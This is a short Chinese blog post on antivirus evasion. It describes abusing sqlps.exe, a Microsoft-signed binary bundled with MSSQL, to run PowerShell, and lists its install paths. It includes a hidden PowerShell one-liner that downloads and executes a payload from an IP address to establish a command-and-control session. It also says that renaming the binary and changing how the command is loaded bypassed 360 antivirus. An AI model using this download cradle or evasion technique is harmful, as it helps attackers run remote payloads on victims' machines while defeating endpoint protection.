免杀| sqlps白文件利用
title: sqlps白文件利用
date: 2022-12-15 12:30:02
tags:
- 免杀
- 白文件
categories:
- 免杀
comments: true
环境win10
mssql:2017
环境安装:
sqlps是mssql 安装后附带的一个具有Microsoft签名的二进制文件,可以用来加载一些命令 直接执行会发现是powershell
文件位置位于:
路径:
C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe
C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe
Microsoft SQL Server\100 和 110 是 Powershell v2。Microsoft SQL Server\120 和 130 是 Powershell 版本 4。在 SQL Server 2016 中被 SQLToolsPS.exe 取代,但出于兼容性原因将包含在安装中。
此文件没有依赖 可以单独提出来在没有sql server的机器里面运行
利用此文件来进行上线
直接执行:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.150.127.128:80/a'))"
然后用sqlps执行
360:
进行绕过
这里是换了一种加载powershell命令的方式和重命名了sqlps文件来进行的绕过 方式肯定很多 就不一一列举了
参考:
- 点赞
- 收藏
- 关注作者
评论(0)